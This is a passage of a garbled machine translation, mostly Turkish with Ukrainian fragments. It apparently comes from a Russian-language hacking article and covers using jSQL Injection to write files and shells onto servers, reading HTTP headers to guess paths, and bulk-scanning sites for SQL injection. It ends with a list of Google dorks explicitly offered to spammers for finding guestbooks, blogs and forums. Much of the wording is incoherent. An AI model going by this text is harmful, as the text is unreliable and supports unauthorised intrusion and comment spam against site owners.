Daha da önemlisi - pratik yapabileceğimiz dosyanın kesin yolunu bilmemiz gerekiyor - aksi takdirde hiçbir şey göremeyiz.

Sonraki ekran görüntüsüne bakın:

İşlemi dosyayla deneyip denemediğim konusunda bize şunlar söylendi: DOSYA ayrıcalığı yok(Dosya ayrıcalığı yok). Ve burada hiçbir şey yapılamaz.

Ne kadar milliyetçisin bir affın daha var:

[dizin_adı] içine yazma sorunu

Bu, dosyayı yazmak için gerekli olan mutlak yolu yanlış girdiğiniz anlamına gelir.

Mutlak yolu seçebilmek için en azından sunucunun çalıştığı işletim sistemini bilmek gerekir. Bunun için Ağ sekmesine gidin.

Böyle bir kayıt (satır Win64) bize bir ipucu verin, Windows işletim sistemi ile sağda neler yapılabilir:

Canlı Tut: zaman aşımı=5, max=99 Sunucu: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Bağlantı: Canlı Tut Yöntemi: HTTP/1.1 200 Tamam İçerik Uzunluğu: 353 Tarih: Cum, 11 Ara 20 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 İçerik-Türü: metin/html; karakter kümesi=UTF-8

Burada Unix'ten bir versiyonumuz var (*BSD, Linux):

Aktarım Kodlaması: yığınlanmış Tarih: Cum, 11 Aralık 2015 11:57:02 GMT Yöntem: HTTP/1.1 200 Tamam Canlı Tut: zaman aşımı=3, maks=100 Bağlantı: canlı tut İçerik Türü: metin/html X- Destekleyen: PHP/5.3.29 Sunucu: Apache/2.2.31 (Unix)

Ve burada CentOS var:

Metod: HTTP/1.1 200 Tamam Sona Erme: Per, 19 Kasım 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; yol=/ Bağlantı: canlı tutma X-Cache-Lookup: MISS like t1.hoster.ru:6666 Sunucu: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS like t1.hoster.ru Önbellek Kontrolü: mağaza yok, önbellek yok, yeniden doğrulama gerekir, kontrol sonrası=0, ön kontrol=0 Pragma: önbellek yok Tarih: Cum, 11 Aralık 2015 12:08:54 GMT Aktarım-Kodlama: parçalı İçerik-Türü: metin/html; karakter kümesi=WINDOWS-1251

Windows'un siteler için tipik bir klasörü vardır C:\Sunucu\veri\htdocs\. Ancak, gerçekten, Windows'ta bir sunucu çalıştırmayı "düşünüyorsanız", o zaman belki de bu kişi ayrıcalıklar hakkında hiçbir şey düşünmedi. Başlamak için, doğrudan C:/Windows/ dizininden aşağıdakileri deneyin:

Yak bachimo, ilk seferinde her şey mucizevi bir şekilde gitti.

Ancak jSQL Enjeksiyon kabuklarının kendileri bana sumniv diyor. Dosya ayrıcalıklarınız varsa, web arayüzü ile her şeyi alabilirsiniz.

8. SQL-іn'єktsії üzerindeki sitelerin toplu olarak yeniden doğrulanması

І jSQL Injection için bu fonksiyonda gezinin. Her şey daha basit - sitelerin listesine girin (bir dosyadan içe aktarabilirsiniz), değiştirmek istiyorsanız seçin ve işlemi başlatmak için düğmeye basın.

jSQL Enjeksiyonu için Wisnovok

jSQL Injection, SQL enjeksiyon sitelerinde bulunan bazı kalitesiz bilgilerle dalga geçmek için iyi ve zorlu bir araçtır. Sonsuz artılar var: seçim kolaylığı, eşlik eden işlevlerin tanıtımı. jSQL Injection, web sitesi analizi için yeni başlayanların en iyi arkadaşı olabilir.

Eksikliklerden, veritabanlarını düzenlemenin imkansızlığı hakkında konuşurdum (hangi işlevi kabul ettiğimi bilmiyorum). Grafiksel bir arayüze sahip tüm araçlar gibi, küçük bir ölçüde, programlar da komut dosyalarında vikoristannya'nın imkansızlığına bağlanabilir. Proteak otomasyonu mümkündür ve bu programda sitelerin toplu olarak yeniden doğrulanması işlevini başlatabilirsiniz.

jSQL Enjeksiyon programı, sqlmap'ten önemli ölçüde daha iyidir. Ale sqlmap daha fazla SQL eylemi türü ekler, dosya güvenlik duvarları ve diğer işlevlerle çalışma seçeneklerine sahip olabilir.

Alt çanta: jSQL Injection, bilgisayar korsanının en iyi arkadaşıdır.

Bu programın bir özetini bu taraftaki Kali Linux Ansiklopedisinde bulabilirsiniz: http://kali.tools/?p=706

Yak doğru şekilde Shukat yardım için google.com

Herkes böyle bir spoof sistemi ile birlikte şarkı söyleyebilir, örneğin Google =) Ancak ek özel yapılar için bir spoof notu nasıl doğru bir şekilde bir araya getireceğinizi bilmiyorsanız, o zaman shukaєte yaptığınız şeyin sonuçlarını daha etkili ve daha verimli elde edebilirsiniz. =) ve nasıl çalışmanız gerekiyor, doğru shukati için

Google, google.com'da arama saatleri için özel bir değeri olabilecek aramalar için birkaç uzantı operatörünü destekler. Tipik olarak, qi operatörleri aramaları değiştirir veya Google'a tamamen farklı türde aramalar yapıyor gibi görünürler. Örneğin, inşaat bağlantı:є özel bir operatör tarafından bağlantı: www.google.com Size normal bir şaka yapmayacağım ama gelin tüm web sitelerini bulalım, google.com'a nasıl link yapılır onu öğrenelim.
alternatif içecek türleri

önbellek:İsteğe başka kelimeler eklerseniz, Google, önbelleğe alınan belgenin sınırlarında dahil edilen kelimelerin sayısını vurgulayacaktır.
Örneğin, önbellek:www.web sitesi"web" kelimesinin yardımıyla para çekmeyi gösterin.

bağlantı: Danca arama talebi, talep edilen talep için başvurabileceğiniz web sayfalarını size gösterecektir.
Örneğin: bağlantı: www.web sitesiє http://www.site adresine bakın

ilişkili: Belirtilen web tarafına "benzer" (ilgili) olan web sayfalarını görüntüleyin.
Örneğin, ilgili: www.google.com perehuє web tarafları, Google'ı eve ya da storіnki Google'a yakі є podіbimi.

bilgi: Bilgi iste: Google'ın web sayfasını talep etme konusunda sahip olabileceği biraz bilgi sağlayın.
Örneğin, bilgi:web sitesi forumumuzla ilgili bilgileri göster =) (Armada - Yetişkin Web Yöneticisi Forumu).

Diğer bilgi talepleri

tanımlamak:İstek tanımla: Belirli kelimeleri sağlamak için, siparişten sonra nasıl gireceğiniz, farklı dantel iplerinden seçildiği gibi. Girilen tüm ifadelere atanacaktır (böylece tüm kelimeleri tam sorguya dahil ediyoruz).

Hisse senetleri: Hisse senetlerinden bir talep başlatırsanız: Google, borsa bağlantılarının bir sembolü olarak şartların çözümlenmesini işleyecek ve bu sembollere ilişkin bilgileri size göstermesi için üçüncü tarafla iletişime geçecektir.
Örneğin, Hisse senetleri: Intel Yahoo Intel ve Yahoo hakkında bilgi göster. (Şirket adını vermeden kalan yeniliklerin sembollerini ihlal etmekten ne suçlu olduğunuzu belirleyin)

İstek Değiştiriciler

alan: Sorgunuza site: eklerseniz, Google sonuçları o etki alanında olduğunu bildiğiniz web siteleriyle çevreler.
Ayrıca ru, org, com, vb. gibi diğer bölgelerde de arama yapabilirsiniz ( site:com site:ru)

allintitle: allintitle: için bir istek çalıştırırsanız, Google sonuçları başlıkta en fazla kelimeyle çevreler.
Örneğin, allintitle: google arama resim, blog vb. arama yapmak için google'ın her yönünü çevirin

Başlık: Ayrıca, intitle: isteğiniz üzerine Google, başlıktaki kelimeyi değiştirmek için sonuçların etrafını belgelerle çevreleyecektir.
Örneğin, intitle:İş

allinurl: Böylece allinurl ile bir sorgu çalıştırıyorsunuz: Google sonuçları sarın, URL'yi birkaç kelime ile sorgulayın.
Örneğin, allinurl: google arama Dokümanı google'dan döndürün ve başlığında arayın. Ayrıca, bir seçenek olarak, bir eğik çizginin kenarlarında aynı kelimeleri bir eğik çizgiyle (/) bölebilirsiniz. allinurl: foo/bar

inurl: Ayrıca inurl'yi de dahil edebilirsiniz: isteğiniz üzerine Google, URL'deki kelimeyi kaldırmak için sonuçları belgelerle çevreler.
Örneğin, Animasyon inurl:web sitesi

metin: sadece metinde şaka yaparak bir kelime atanır, eklenmiş metnin adı yok sayılır ve aksi halde daha önce görülmez. Ve ayrıca bu değiştiricinin maliyeti - tüm metin: tobto. istekte verilen tüm kelimeler sadece metinde karıştırılacaktır, bu da önemlidir, mesajlarda sıklıkla tekrarlanan kelimelerin göz ardı edilmesi de önemlidir.
Örneğin, metin:forum

tarih aralığı: shukaє zaman dilimlerinde (tarih aralığı: 2452389-2452389), saat için tarihler Jülyen biçiminde belirtilir.

Ve her çeşit ağustosböcekleri içecekler için geçerlidir

Google için bir katlama isteği uygulayın. spam gönderenler için

inurl:control.guest?a=işaret

Site:books.dreambook.com "Ana sayfa URL'si" "Sign my" inurl:sign

Site:www.freegb.net Ana Sayfa

Inurl:sign.asp "Karakter Sayısı"

"Mesaj:" inurl:sign.cfm "Gönderen:"

inurl:register.php “Kullanıcı Kaydı” “Web Sitesi”

Inurl:edu/misafir defteri “Ziyaretçi Defterini İmzala”

Inurl: "Yorum Gönder" "URL" gönder

Inurl:/archives/ “Yorumlar:” “Bilgiyi hatırlıyor musunuz?”

“Script ve Ziyaretçi Defteri Oluşturan:” “URL:” “Yorumlar:”

inurl:?action=“phpBook” “URL” ekle

Başlık:"Yeni Hikaye Gönder"

dergiler

inurl:www.livejournal.com/users/mode=reply

inurl greatjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru/re.pl? "misafir defteri"

Bloglar

Inurl:blogger.com/comment.g?"postID""anonim"

Inurl:typepad.com/ “Yorum gönder” “Kişisel bilgileri hatırlıyor musun?”

Inurl:greatestjournal.com/community/ “Yorum gönder” “anonim posterlerin adresleri”

"Yorum gönder" "anonim posterlerin adresleri" -

Intitle:"Yorum gönder"

Inurl:pirillo.com “Yorum gönder”

forum

Inurl:gate.html?”name=Forumlar” “mod=yanıtla”

inurl:”forum/posting.php?mode=reply”

inurl: "mes.php?"

inurl: "üyeler.html"

inurl:forum/üye listesi.php?”